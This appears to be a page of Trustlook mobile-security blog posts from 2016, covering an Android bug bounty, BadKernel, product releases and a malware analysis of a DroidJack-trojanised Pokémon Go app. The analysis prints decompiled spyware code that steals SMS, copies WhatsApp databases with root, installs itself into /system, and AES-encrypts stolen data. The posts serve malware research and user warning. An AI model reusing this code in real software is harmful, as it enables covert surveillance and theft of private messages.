Google Offers $200,000 to Find Android Vulnerabilities

Show me the money might become the new moniker in the hacking world. And with good reason. Google has announced it is going to offer up to $200,000 in prize money to the first team that can find a bug chain that can give remote access to multiple Android devices by just knowing their email address or phone numbers.

Announced by Google’s Project Zero research team, the contest began on 9/14/2016 and is scheduled to run through next March 14. Researchers are invited to find critical bugs in Android, specifically on Nexus 6P and Nexus 5x devices running builds that are current for the specific device.

This offer is largely in response to the widespread Android vulnerability discovered in August 2016 named Quadrooter that affected 900 million devices.

Google is banking on the prize amount being a motivator for hackers to find flaws in the ecosystem. The first prize in the competition is $200,000; the second prize is $100,000 and the third prize is $50,000. There will be additional awards for winning entries that are able to find flaws in the Google’s operating system.

Trustlook Mobile Security SDK Whitepaper Now Available

The Trustlook Mobile Security SDK is a robust, feature-packed, and multi-layered security framework for building mobile security apps. Learn how you can use the SDK to build your security app with the newly release whitepaper. See how GO Security was able to use Trustlook’s SDK to build one of the most popular security app in the Google Play store.

Download here:
http://www.trustlook.com/sdk_whitepaper/

Pokémon Go bundles with Malicious Remote Administration Tool DroidJack

Due to the expanding popularity of Pokémon Go, the app has attracted more hacker’s attention than ever, because the popular game app can help hackers spread their malicious apps more efficiently. An app was recently discovered by Trustlook that is a Pokémon Go app repackaged with the RAT (Remote Administration Tool) tool DroidJack. The app appears to be a normal game, but actually can be used to control the user’s device. The research Trojan package can be identified as having the following characteristics:

  • MD5: d350cc8222792097317608ea95b283a8
  • SHA256: 15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4
  • Size: 184036 bytes
  • App name: 61029052
  • Package name: com.nianticlabs.pokemongo

The app is identical to the normal Pokémon Go app when it is running:

 
image02 image01

image04 image03

The app is signed with the following certificate, which does not belong to the Pokemon Go game developer:

image06

From the follow code structure images, the package “net.droidjack.server” can be found:

image05

The DroidJack RAT tool can perform the following malicious activities:

  • Get SMS Messages
  • Monitor/record calls
  • Get call logs
  • Browser bookmarks/history
  • WhatsApp Call Logs
  • GPS location
  • WhatsApp Chat
  • Record sound
  • Capture video
  • Take picture
  • Send device information
  • Install file to system folder 
  • Update itself

 

The following code snippets are responsible for collecting SMS messages:

protected void a()

 {

   ag localag = new ag(this.c);

   localag.b();

   Object localObject = Uri.parse(“content://sms/sent”);

   Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);

   if (localCursor.getCount() > 0) {}

   for (;;)

   {

     if (!localCursor.moveToNext()) {

       return;

     }

     String str3 = localCursor.getString(localCursor.getColumnIndex(“body”));

     String str1 = localCursor.getString(localCursor.getColumnIndex(“address”));

     String str4 = localCursor.getString(localCursor.getColumnIndex(“date”));

     String str2 = a(str1);

     localObject = str2;

[…]  

 protected void b()

 {

   ag localag = new ag(this.c);

   localag.a();

   Object localObject = Uri.parse(“content://sms/inbox”);

   Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);

   if (localCursor.getCount() > 0) {}

   for (;;)

   {

     if (!localCursor.moveToNext()) {

       return;

     }

     String str3 = localCursor.getString(localCursor.getColumnIndex(“body”));

     String str1 = localCursor.getString(localCursor.getColumnIndex(“address”));

     String str2 = a(str1);

     localObject = str2;

     if (str2 == null) {

       localObject = str1;

     }

     localag.a(str1, (String)localObject, str3, localCursor.getString(localCursor.getColumnIndex(“date”)));

   }

 }

 

The following code snippets are used to retrieve WhatsApp logs:


protected byte[] a()

 {

   try

   {

     this.d = new File(Environment.getExternalStorageDirectory() + “/WhatsApp/Databases/wams.db”);

     Object localObject = new DataOutputStream(Runtime.getRuntime().exec(“su”).getOutputStream());

     ((DataOutputStream)localObject).writeBytes(“cp data/data/com.whatsapp/databases/msgstore.db ” + this.d.getAbsolutePath());

     ((DataOutputStream)localObject).writeBytes(“nexit”);

     Thread.sleep(10000L);

     if (this.d.exists()) {}

     return “NoWA”.getBytes();

   }

 

The following code snippets are used to install files to the system folder:

public class FBDBSender

protected byte[] c()

 {

   try

   {

     Object localObject = new File(this.a.getPackageManager().getApplicationInfo(this.a.getPackageName(), 128).sourceDir);

     DataOutputStream localDataOutputStream = new DataOutputStream(Runtime.getRuntime().exec(“su”).getOutputStream());

     localDataOutputStream.writeBytes(“mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /systemn”);

     localDataOutputStream.writeBytes(“cp -rp ” + ((File)localObject).getAbsolutePath() + ” /system/app/” + ((File)localObject).getName());

     localDataOutputStream.writeBytes(“nmount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system”);

     localDataOutputStream.writeBytes(“nexit”);

     Thread.sleep(10000L);

     localObject = “Ack”.getBytes();

     return localObject;

   }


The malware may encrypt the collected data using AES before sending it out:

public class aj

{

 private static final byte[] a = { 76, 82, 83, 65, 78, 74, 85, 73, 83, 84, 72, 69, 82, 65, 74, 65 };

 

 public static String a(String paramString)

 {

   Key localKey = a();

   Cipher localCipher = Cipher.getInstance(“AES”);

   localCipher.init(1, localKey);

   return Base64.encodeToString(localCipher.doFinal(paramString.getBytes()), 0);

 }

 

 private static Key a()

 {

   return new SecretKeySpec(a, “AES”);

 }

 

 public static String b(String paramString)

 {

   Key localKey = a();

   Cipher localCipher = Cipher.getInstance(“AES”);

   localCipher.init(2, localKey);

   return new String(localCipher.doFinal(Base64.decode(paramString, 0)));

 }

}

   

Summary

Installing apps from third-party sources may expose your device to potential threats. Downloading from a trusted source is a way to keep devices secure. Installing a security app such as Trustlook Mobile Security & Antivirus also help to prevent identity theft and safeguard you online.

Trustlook Sentinel Whitepaper Now Available!

Are you interested in learning more about one of the most groundbreaking technologies in mobile security?

Trustlook Sentinel is the first ever 100% behavioral based malware detection engine built into the operating system of a mobile device. It’s provides real-time zero day detection of malware. Download the whitepaper here and discover when Sentinel is considered a game changer in security. >>

Trustlook Mobile Security Releases Instant Protection Feature

Trustlook has released a new feature in its Trustlook Mobile Security app that proactively notifies users of any new malware on their device. Instead of a user needing to re-scan their device in order to find malware, Trustlook will send a message to users if it discovers malware that was previously unknown.

For example:

  1. Jack installs a new app
  2. The Trustlook Mobile Security protection is triggered, and the app is uploaded to Trustlook’s cloud. But in some small instances Trustlook’s system has no prior knowledge of the app, so we consider it benign.
  3. A few days later, Trustlook’s Core Security system detects this new app as a malware
  4. Trustlook Operations launches “Instant Protection” to notify Jack of this malware and to uninstall the app.

In a perfect world, mobile devices would be 100% protected from security risks because security vendors would be aware of every malicious application that exists. However, that is not reality.  It’s not possible to have full, 100% coverage. So to mitigate this security risks, Trustlook now offers Instant Protection.

Oops! BadKernel Now Affects 100 Million, Not 30 Million

We reported last week that BadKernel, a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links, affects 30 million Android users. However, from our internal reporting over the past few days, it’s clear that the actual number is much higher. Our new estimate is that BadKernel now impacts 100 million Android users. This is about 7% of the total Android user base.

Trustlook has released a new feature in its Trustlook Mobile Security  app that detects BadKernel. You are encouraged to scan your phone today and see if you are impacted.

Trustlook Releases BadKernel Vulnerability Detector

An Updated Version (Version 3.5.10) of the Trustlook Mobile Security App Identifies the BadKernel Issue Affecting 30 Million Android Users

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel, the widespread vulnerability affecting millions of Android devices.

First discovered in August 2016, BadKernel is a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links. Users of older versions of Chromium-powered mobile browsers, as well as applications with embedded Webview (such as the massively popular WeChat app) may be vulnerable. If infected, a user’s contacts and text messages could be exposed, as well as any payment passwords.

To determine if your device is vulnerable to this threat, open the Trustlook Mobile Security app, navigate to the BadKernel Vulnerability detector on the main screen, and click “Check it Now.” If you are exposed, you can update your browser software.

Screenshot_2016-08-26-11-50-26         Screenshot_2016-08-26-11-50-33
The BadKernel vulnerability impacts an estimated 30 million Android smartphones and tablets. The flaw involves a bug in the source code of Google’s V8 JavaScript Engine, which is a component of the open-source Chromium. An attacker can exploit this flaw to cause key object information leakage.

Since many phones are not using the most current browser software, this zero-day attack could be used widely. Trustlook encourages users to run a quick scan of their phone and update their browser if they are affected. In addition, Trustlook suggests users not click on random links or links that appear suspicious. They also stress users keep their apps and OS updated, and continually monitor their device for any potential issues.

To check if your Android device is affected by the BadKernel vulnerability, please download the Trustlook Mobile Security app.